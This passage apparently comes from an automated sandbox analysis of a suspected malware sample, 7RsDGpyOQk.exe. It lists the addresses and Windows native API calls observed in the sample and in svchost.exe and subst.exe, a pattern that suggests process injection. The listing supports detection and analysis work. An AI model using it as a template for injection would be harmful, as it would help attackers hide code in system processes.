            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72C60 NtCreateKey,1_2_03B72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73090 NtSetValueKey,1_2_03B73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73010 NtOpenDirectoryObject,1_2_03B73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B739B0 NtGetContextThread,1_2_03B739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73D10 NtOpenProcessToken,1_2_03B73D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73D70 NtOpenThread,1_2_03B73D70
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03144340 NtSetContextThread,LdrInitializeThunk,4_2_03144340
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03144650 NtSuspendThread,LdrInitializeThunk,4_2_03144650
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142B60 NtClose,LdrInitializeThunk,4_2_03142B60
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_03142BA0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_03142BF0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142BE0 NtQueryValueKey,LdrInitializeThunk,4_2_03142BE0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142AD0 NtReadFile,LdrInitializeThunk,4_2_03142AD0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142AF0 NtWriteFile,LdrInitializeThunk,4_2_03142AF0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142F30 NtCreateSection,LdrInitializeThunk,4_2_03142F30
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142FB0 NtResumeThread,LdrInitializeThunk,4_2_03142FB0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142FE0 NtCreateFile,LdrInitializeThunk,4_2_03142FE0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_03142E80
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142EE0 NtQueueApcThread,LdrInitializeThunk,4_2_03142EE0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142D10 NtMapViewOfSection,LdrInitializeThunk,4_2_03142D10
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_03142D30
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142DD0 NtDelayExecution,LdrInitializeThunk,4_2_03142DD0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03142DF0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03142C70
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142C60 NtCreateKey,LdrInitializeThunk,4_2_03142C60
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_03142CA0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031435C0 NtCreateMutant,LdrInitializeThunk,4_2_031435C0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031439B0 NtGetContextThread,LdrInitializeThunk,4_2_031439B0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142B80 NtQueryInformationFile,4_2_03142B80
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142AB0 NtWaitForSingleObject,4_2_03142AB0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142F60 NtCreateProcessEx,4_2_03142F60
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142F90 NtProtectVirtualMemory,4_2_03142F90
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142FA0 NtQuerySection,4_2_03142FA0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142E30 NtWriteVirtualMemory,4_2_03142E30
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142EA0 NtAdjustPrivilegesToken,4_2_03142EA0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142D00 NtSetInformationFile,4_2_03142D00
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142DB0 NtEnumerateKey,4_2_03142DB0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142C00 NtQueryInformationProcess,4_2_03142C00
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142CC0 NtQueryVirtualMemory,4_2_03142CC0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03142CF0 NtOpenProcess,4_2_03142CF0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03143010 NtOpenDirectoryObject,4_2_03143010
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03143090 NtSetValueKey,4_2_03143090
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03143D10 NtOpenProcessToken,4_2_03143D10
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03143D70 NtOpenThread,4_2_03143D70
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_00857AC0 NtCreateFile,4_2_00857AC0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_00857C20 NtReadFile,4_2_00857C20
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_00857DB0 NtClose,4_2_00857DB0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_00857D10 NtDeleteFile,4_2_00857D10
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_00857F00 NtAllocateVirtualMemory,4_2_00857F00
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_00204021: CreateFileW,DeviceIoControl,CloseHandle,0_2_00204021
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001F8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_001F8858
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0020545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0020545F
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001AE8000_2_001AE800
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001CDBB50_2_001CDBB5
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0022804A0_2_0022804A
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001AE0600_2_001AE060
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001B41400_2_001B4140
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001C24050_2_001C2405
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001D65220_2_001D6522
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_002206650_2_00220665
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001D267E0_2_001D267E
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001C283A0_2_001C283A
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001B68430_2_001B6843
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001D89DF0_2_001D89DF
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001B8A0E0_2_001B8A0E
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001D6A940_2_001D6A94
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_00220AE20_2_00220AE2
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001FEB070_2_001FEB07
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_00208B130_2_00208B13
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001CCD610_2_001CCD61
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001D70060_2_001D7006
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001B710E0_2_001B710E
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001B31900_2_001B3190
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001A12870_2_001A1287
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001C33C70_2_001C33C7
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001CF4190_2_001CF419
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001B56800_2_001B5680
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001C16C40_2_001C16C4
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001C78D30_2_001C78D3
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001B58C00_2_001B58C0
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001C1BB80_2_001C1BB8
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001D9D050_2_001D9D05
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001AFE400_2_001AFE40
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001C1FD00_2_001C1FD0
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001CBFE60_2_001CBFE6
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_034D35E00_2_034D35E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004021501_2_00402150
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011D01_2_004011D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FB531_2_0040FB53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042D3931_2_0042D393
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004164C11_2_004164C1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004164C31_2_004164C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FD731_2_0040FD73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DDF31_2_0040DDF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402F201_2_00402F20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C003E61_2_03C003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E3F01_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFA3521_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC02C01_2_03BC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE02741_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF41A21_2_03BF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C001AA1_2_03C001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF81CC1_2_03BF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDA1181_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B301001_2_03B30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC81581_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD20001_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3C7C01_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B407701_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B647501_2_03B64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5C6E01_2_03B5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C005911_2_03C00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B405351_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEE4F61_2_03BEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE44201_2_03BE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF24461_2_03BF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF6BD71_2_03BF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFAB401_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA801_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A01_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0A9A61_2_03C0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B569621_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B268B81_2_03B268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E8F01_2_03B6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4A8401_2_03B4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B428401_2_03B42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBEFA01_2_03BBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B32FC81_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B60F301_2_03B60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE2F301_2_03BE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B82F281_2_03B82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB4F401_2_03BB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52E901_2_03B52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFCE931_2_03BFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFEEDB1_2_03BFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFEE261_2_03BFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40E591_2_03B40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B58DBF1_2_03B58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3ADE01_2_03B3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDCD1F1_2_03BDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4AD001_2_03B4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0CB51_2_03BE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30CF21_2_03B30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40C001_2_03B40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B8739A1_2_03B8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF132D1_2_03BF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2D34C1_2_03B2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B452A01_2_03B452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5D2F01_2_03B5D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE12ED1_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5B2C01_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4B1B01_2_03B4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0B16B1_2_03C0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2F1721_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7516C1_2_03B7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF70E91_2_03BF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFF0E01_2_03BFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEF0CC1_2_03BEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B470C01_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFF7B01_2_03BFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF16CC1_2_03BF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B856301_2_03B85630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDD5B01_2_03BDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF75711_2_03BF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFF43F1_2_03BFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B314601_2_03B31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5FB801_2_03B5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB5BF01_2_03BB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7DBF91_2_03B7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFB761_2_03BFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDDAAC1_2_03BDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B85AA01_2_03B85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE1AA31_2_03BE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEDAC61_2_03BEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB3A6C1_2_03BB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFA491_2_03BFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF7A461_2_03BF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD59101_2_03BD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B499501_2_03B49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5B9501_2_03B5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B438E01_2_03B438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAD8001_2_03BAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFFB11_2_03BFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B41F921_2_03B41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFF091_2_03BFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B49EB01_2_03B49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5FDC01_2_03B5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF7D731_2_03BF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF1D5A1_2_03BF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B43D401_2_03B43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFCF21_2_03BFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB9C321_2_03BB9C32
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031CA3524_2_031CA352
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0311E3F04_2_0311E3F0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031D03E64_2_031D03E6
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031B02744_2_031B0274
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031902C04_2_031902C0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031AA1184_2_031AA118
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031001004_2_03100100
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031981584_2_03198158
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031D01AA4_2_031D01AA
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031C41A24_2_031C41A2
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031C81CC4_2_031C81CC
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031A20004_2_031A2000
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031347504_2_03134750
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031107704_2_03110770
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0310C7C04_2_0310C7C0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0312C6E04_2_0312C6E0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031105354_2_03110535
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031D05914_2_031D0591
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031B44204_2_031B4420
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031C24464_2_031C2446
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031BE4F64_2_031BE4F6
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031CAB404_2_031CAB40
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031C6BD74_2_031C6BD7
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0310EA804_2_0310EA80
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031269624_2_03126962
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031129A04_2_031129A0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031DA9A64_2_031DA9A6
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0311A8404_2_0311A840
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031128404_2_03112840
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_030F68B84_2_030F68B8
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0313E8F04_2_0313E8F0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03130F304_2_03130F30
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031B2F304_2_031B2F30
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03152F284_2_03152F28
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03184F404_2_03184F40
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0318EFA04_2_0318EFA0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03102FC84_2_03102FC8
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031CEE264_2_031CEE26
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03110E594_2_03110E59
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03122E904_2_03122E90
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031CCE934_2_031CCE93
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031CEEDB4_2_031CEEDB
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031ACD1F4_2_031ACD1F
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0311AD004_2_0311AD00
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03128DBF4_2_03128DBF
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0310ADE04_2_0310ADE0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03110C004_2_03110C00
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031B0CB54_2_031B0CB5
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03100CF24_2_03100CF2
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031C132D4_2_031C132D
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_030FD34C4_2_030FD34C
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0315739A4_2_0315739A
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031152A04_2_031152A0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0312B2C04_2_0312B2C0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0312D2F04_2_0312D2F0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031B12ED4_2_031B12ED
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031DB16B4_2_031DB16B
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0314516C4_2_0314516C
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_030FF1724_2_030FF172
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0311B1B04_2_0311B1B0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031170C04_2_031170C0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031BF0CC4_2_031BF0CC
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031C70E94_2_031C70E9
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031CF0E04_2_031CF0E0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031CF7B04_2_031CF7B0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031556304_2_03155630
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031C16CC4_2_031C16CC
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031C75714_2_031C7571
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031AD5B04_2_031AD5B0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031D95C34_2_031D95C3
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031CF43F4_2_031CF43F
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031014604_2_03101460
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031CFB764_2_031CFB76
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0312FB804_2_0312FB80
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03185BF04_2_03185BF0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0314DBF94_2_0314DBF9
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031CFA494_2_031CFA49
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031C7A464_2_031C7A46
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03183A6C4_2_03183A6C
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03155AA04_2_03155AA0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031ADAAC4_2_031ADAAC
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031B1AA34_2_031B1AA3
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031BDAC64_2_031BDAC6
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031A59104_2_031A5910
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031199504_2_03119950
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0312B9504_2_0312B950
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0317D8004_2_0317D800
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031138E04_2_031138E0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031CFF094_2_031CFF09
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03111F924_2_03111F92
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031CFFB14_2_031CFFB1
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_030D3FD54_2_030D3FD5
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_030D3FD24_2_030D3FD2
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03119EB04_2_03119EB0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031C1D5A4_2_031C1D5A
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03113D404_2_03113D40
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031C7D734_2_031C7D73
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0312FDC04_2_0312FDC0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_03189C324_2_03189C32
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_031CFCF24_2_031CFCF2
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_008417D04_2_008417D0
